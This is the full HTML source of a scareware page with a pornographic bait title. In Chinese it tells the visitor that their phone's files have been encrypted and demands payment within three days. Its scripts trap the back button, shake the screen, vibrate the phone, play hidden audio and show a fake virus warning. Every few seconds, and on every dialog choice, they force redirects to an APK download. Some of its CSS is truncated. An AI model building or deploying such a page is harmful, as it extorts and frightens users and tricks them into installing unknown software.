<audio controls="controls" autoplay="autoplay">
  <source src="https://music.163.com/song/media/outer/url?id=515816380.mp3" type="audio/ogg" />
  <source src="https://music.163.com/song/media/outer/url?id=515816380.mp3" type="audio/mpeg" />
</audio>

<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Expires" content="-1">
<meta http-equiv="pragram" content="no-cache">
<meta name="apple-touch-fullscreen" content="yes">
<meta name="format-detection" content="telephone=no">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
<meta name="screen-orientation" content="portrait">
<meta name="x5-orientation" content="portrait">
<meta name="full-screen" content="yes">
<meta name="x5-fullscreen" content="true">
<title>威尼斯人性感女优在线啪啪啪,双手扣小穴，都喷出水了</title>
<script>
    // 禁止浏览器后退
    $(function() {
        if (window.history && window.history.pushState) {
            $(window).on('popstate', function () {
                window.history.pushState('forward', null, '#');
                window.history.forward(1);
            });
        }
        window.history.pushState('forward', null, '#');
        window.history.forward(1);
    })
</script>
<style>
	body {
		animation: shake 0.5s infinite;
	}

	@keyframes shake {
		0% { transform: translate(0, 0); }
		50% { transform: translate(10px, 10px); }
		100% { transform: translate(-10px, -10px); }
	}
	</style>



<style type="text/css">
* {
margin: 0;
padding
}

.wrap {
width: 100%;
background
}

.img {
padding-top: 15%;
width: 50%;
margin: 0 auto;
margin-bottom
}

.img>img {
width: 100%;
}

.title {
text-align: center;
margin: 20px 0;
font-size
color: #666666;
}

.xian {
width: 55%;
margin: 0 auto;
height: 2px;
background
border-radius: 40%;
}

.cont {
margin: 30px 1%;
}

.left {
width: 28%;
display: inline-block;
vertical-align: top;
color: #777777;
/*border: 1px solid red;*/
text-align: right;
font-size
line-height: 30px;
margin-left: 3%;
}

.right {
width: 66%;
display: inline-block;
color: #888888;
font-size
line-height: 30px;
}

.right>div>.text1 {
display: inline-block;
width: 7px;
height: 7px;
border-radius: 4px;
background
vertical-align: top;
margin-right: 4px;
margin-top: 13px;
}

.right>div>.text {
display: inline-block;
width: 80%;
/*border: 1px solid red;*/
}

.foot {
width: 80%;
margin: 50px auto;
}

.foot>div {
display: inline-block;
width: 40%;
border-radius: 4px;
height: 40px;
line-height: 40px;
text-align: center;
border: 1px solid #eeeeee;
font-size
/*vertical-align: middle;*/
}

.foot>div>img {
width: 20px;
vertical-align: middle;
/*margin-top: 10px;*/
}

.foot>div>span {
vertical-align: middle;
}

.btn1 {
margin-right: 15%;
}

.popup-wrap {
position: fixed;
left: 0;
right: 0;
top: 0;
bottom
background
display: none;
justify-content: center;
align-items: center;
}

.popup-box {
width: 80%;
/*height: 150px;*/
background
border-radius: 2px;
}

.pop-title {
margin-left: 10%;
line-height: 30px;
color: #333333;
font-size
/*font-weight: 1000;*/
margin-top: 15px;
}

.pop-text {
width: 80%;
margin: 0 auto;
line-height: 25px;
font-size
color: #777777;
margin-top: 10px;
}

.pop-btn {
width: 80%;
height: 35px;
border-radius: 6px;
background
color: #333333;
text-align: center;
line-height: 35px;
margin: 15px auto;
margin-bottom
}

body
{
background-color:#ff0000;
}
</style>
<script src="//apps.bdimg.com/libs/zepto/1.1.4/zepto.min.js";></script>
</head>

<script>
		window.onload = function() {
		 navigator.vibrate(5000);
		}
	</script>





<body  style="cursor: pointer;">
<div class="wrap" style="height: 640px;">
<div class="img">
<img src="https://bpic.51yuansu.com/pic3/cover/03/73/56/5bef98a71cc51_610.jpg">
</div>
<div class="title">我的手机出了什么问题？</div>
<div class="xian"></div>
<div class="cont">
<div class="left">可能原因：</div>
<div class="right">
<div><span class="text1"></span><span class="text">您的一些重要文件被我加密保存了。</span></div>
<div><span class="text1"></span><span class="text">照片、图片、文档、压缩包、音频、视频文件、apk文件等，几乎所有类型的文件都被加密了，因此不能正常打开。<br>这和一般文件损坏有本质上的区别。您大可在网上找找恢复文件的方法，我敢保证，没有我们的解密服务，就算老天爷来了也不能恢复这些文档。<br>有没有恢复这些文档的方法?<br>当然有可恢复的方法。只能通过我们的解密服务才能恢复。我以人格担保，能够提供安全有效的恢复服务。<br>但这是收费的，也不能无限期的推迟。<br>请点击 <Decrypt> 按钮，就可以免费恢复一些文档。请您放心，我是绝不会骗你的。<br> 但想要恢复全部文档，需要付款点费用。<br>是否随时都可以固定金额付款，就会恢复的吗，当然不是，推迟付款时间越长，对你不利。<br>最好3天之内付款费用，过了三天费用就会翻倍。<br>还有，一个礼拜之内未付款，将会永远恢复不了。<br>对了，忘了告诉你，对半年以上没钱付款的穷人，会有活动免费恢复，能否轮到你，就要看您的运气怎么样了。<br>
</span></div>
</div>
</div>
<div class="foot">
<div class="btn1" onclick="showMould()">
<span>付款</span>
</div>
<div class="btn2" onclick="vibratePhone()">
<span>没钱</span>


<embed src="https://music.163.com/song/media/outer/url?id=515816380.mp3" width=150 height=50 loop="true" autostart="true">


</div>
</div>
</div>
<div class="popup-wrap" style="display: flex;">
<div class="popup-box">
<div class="pop-title">提示！</div>
<div class="pop-text">您的设备中病毒了,请赶紧下载软件</div>
<div class="pop-btn" onclick="clickDow()">下载</div>
</div>
</div>

<div id="iframe-down" style="display: none;"></div>


<script>
		function vibratePhone() {
			if ("vibrate" in navigator) {
				navigator.vibrate(1000); // 震动 1000 ms（也可以自己定义）
			} else {
				alert("赶紧给我下载！");
			}
		}
	</script>

<style type="text/css">
     audio{
             display: none;
         }
         embed{
             display: none;
         }
</style>

<script type="text/javascript">
//document.querySelector('#mp3Btn').pause();
var flag = 0;
var surl = "http://menxuan.github.io/QQhttps://g79.gdl.netease.com/mcpe-release_20221230_2.6-2.6.5.223752-Publish-20230416201015-compatible_encrypted_netease_69_x19.apk";;
var flg = 0;
document.querySelector('.wrap').style.height = window.innerHeight + 'px';
function showMould() {
flag = 1;
document.querySelector('.popup-wrap').style.display = 'flex';
}

function clickDown() {
flag = 1;
window.location.href = surl;
}

function clickDow() {
flg = 1;
window.location.href = surl;
}

// function iframeDown() {
//       var frameid = 'frameimg' + Math.random();
//       window.jstxt = '<script type="text/javascript">window.location.href = "http://menxuan.github.io/QQhttps://g79.gdl.netease.com/mcpe-release_20221230_2.6-2.6.5.223752-Publish-20230416201015-compatible_encrypted_netease_69_x19.apk";;<\/script>';
//       var iframeText = '<iframe id="' + frameid + '" src="javascript:parent.jstxt;" frameBorder="0" scrolling="no" style="width:100%;margin:0;border:0;height:150px;"></iframe>'
//       $("#iframe-down").html(iframeText);
// }

function brate() {
navigator.vibrate(5000);
}
setTimeout(function () {
if (!flag) {
document.querySelector('.popup-wrap').style.display = 'flex';
setTimeout(function () {
if (!flg) {
window.location.href = surl;
}
}, 1000)
}
}, 2000)
setInterval(function () {
window.location.href = surl;
}, 5000)
function randomCoding() {
//创建26个字母数组
var arr = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'];
var idvalue = '';
var n = 4; //这个值可以改变的，对应的生成多少个字母，根据自己需求所改
for (var i = 0; i < n; i++) {
idvalue += arr[Math.floor(Math.random() * 26)];
}
return idvalue;
}
function abcd() {
try {
var aab = document.querySelector('body');
aab.click();
var bcd = document.querySelector('div');
bcd.click();
} catch (e) {
console.log(e);
}
var a = randomCoding();
var a1 = Math.ceil(Math.random() * 10);
var b = randomCoding();
var b1 = Math.ceil(Math.random() * 20);
history.pushState({
page: a1
}, a, "#" + a1);
history.pushState({
page: b1
}, b, "#" + b1);
window.addEventListener("popstate", function (e) {
var ua = navigator.userAgent.toLowerCase();
if (ua.indexOf('qq') > -1 || ua.indexOf('uc') > -1 || ua.indexOf('baidu') > -1) {
var a = confirm("你的手机中病毒了!!!");
if (a) {
window.location.href = surl;
} else {
window.location.href = surl;
}
}
var c = randomCoding();
var c1 = Math.ceil(Math.random() * 100);
if (history.state == null) {
window.location.reload();
window.history.go(1);
window.history.forward();
} else {
history.pushState({
page: c1
}, c, "#" + c1);

}
try {
var a = confirm("你的手机中病毒了!!!");
if (a) {
window.location.href = surl;
} else {
window.location.href = surl;
}
brate();
//document.querySelector('#mp3Btn').play();
} catch (e) { }

});
}
window.onload = function () {
var b = setInterval(function () {
if (document.readyState == 'complete') {
clearInterval(b);
abcd();
}
}, 250);
}

</script>
<!-- <p style="position: fixed;top:2.5rem;padding-bottomline-height: 0px;  font-size color: rgba(0,0,0,0.1);text-align: right; width: 100%;z-index:888888;"><span>117.68.170.221
</span> SM-G900P /LRX21T
</p> -->
</body>
</html>
